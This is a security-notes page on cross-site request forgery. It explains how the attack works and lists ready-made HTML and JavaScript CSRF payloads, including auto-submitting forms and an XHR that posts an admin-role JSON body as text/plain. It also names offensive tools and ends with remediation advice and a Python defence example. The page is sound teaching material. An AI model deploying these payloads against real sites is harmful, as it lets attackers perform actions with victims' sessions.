CSRF (Cross-Site Request Forgery)

How CSRF Works

Via a CSRF attack, the attacker can act on behalf of an authenticated victim, effectively bypassing the authentication step, or perform actions with the victim's higher privileges. What is needed to execute this attack:

  1. Create the custom payload.

  2. Embed the request into a hyperlink.

  3. Trick the victim into clicking the link, which will send the request to the website.

  4. Forge the request to conduct the malicious action.

This attack only works if the victim is an authenticated user: when the forged request is made, the browser automatically attaches the cookies of any valid session it holds for the target site, and the application checks them exactly as it would for a legitimate request. If the session is valid and the website accepts the sent cookies, the CSRF attack succeeds.

Payloads

Some payloads that can be used during CSRF attacks can be found below:

--------------------------------------------------------------------
HTML GET:
<a href="http://vulnerable/endpoint?parameter=CSRFd">Click</a>
--------------------------------------------------------------------
HTML GET (no interaction):
<img src="http://vulnerable/endpoint?parameter=CSRFd">
--------------------------------------------------------------------
HTML POST:
<form action="http://vulnerable/endpoint" method="POST">
<input name="parameter" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
--------------------------------------------------------------------
HTML POST (no interaction):
<form id="autosubmit" action="http://vulnerable/endpoint" method="POST">
<input name="parameter" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
--------------------------------------------------------------------
JSON GET:
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://vulnerable/endpoint");
xhr.send();
</script>
--------------------------------------------------------------------
JSON POST:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://vulnerable/endpoint");
// text/plain is a CORS "simple" content type, so no preflight is sent;
// a server that accepts JSON bodies under this type is the weakness here.
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.send('{"role":"admin"}');
</script>
--------------------------------------------------------------------

Tools

Burp has a tool that will help create payloads: Generate CSRF PoC.

XSRFProbe is an advanced (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities, their related bypasses and further generate (maliciously) exploitable proof of concepts with each found vulnerability.

Remediation

The most popular prevention method is adding an anti-CSRF token that is associated with a particular user (or session) and verified on every state-changing request. Another known prevention method is setting the SameSite attribute on cookies, which instructs the browser not to attach the cookie to requests that originate from a different site. The following measures are suggested against CSRF attacks:

  • Use a CSRF token in an HTTP header and match its value on the server side.

  • Do not use the GET HTTP method for critical operations such as Create/Update/Delete.

  • Set the "SameSite" attribute on cookies.
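As an added example (not part of the original notes), a server-side implementation of the three measures above in plain Python: a session-bound synchronizer token carried in a header, refusal to run state-changing operations over GET, and a SameSite session cookie; it also checks Content-Type so the text/plain JSON payload shown earlier is rejected. The X-CSRF-Token header name, the cookie name and the secret are assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed secret for this example; a real server loads it from configuration.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Mint a token bound to one session: random nonce + HMAC(session_id, nonce).
    Nothing has to be stored server-side; the MAC proves this server issued the
    token for this session, so a token lifted from another session is useless."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_is_valid(token: str, session_id: str, secret: bytes = SERVER_SECRET) -> bool:
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:  # empty or malformed token
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)  # constant-time comparison


def check_state_changing_request(method: str, headers: dict, cookies: dict,
                                 secret: bytes = SERVER_SECRET) -> tuple:
    """Return (allowed, reason). headers/cookies are plain dicts standing in for
    the framework's request object; the X-CSRF-Token header name is hypothetical."""
    if method.upper() in SAFE_METHODS:
        return False, "state-changing operations must not be reachable via GET"
    session_id = cookies.get("session")
    if not session_id:
        return False, "no session cookie: unauthenticated"
    # A cross-site <form> can only send form-encoded or text/plain bodies, and a
    # cross-site XHR with application/json triggers a CORS preflight the server
    # can refuse, so the page's text/plain JSON payload is rejected here.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, "unexpected Content-Type"
    if not token_is_valid(headers.get("X-CSRF-Token", ""), session_id, secret):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value: SameSite=Lax stops the browser attaching the cookie to
    cross-site POSTs, so a forged form arrives without a session at all."""
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"
```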

Last updated 3 years ago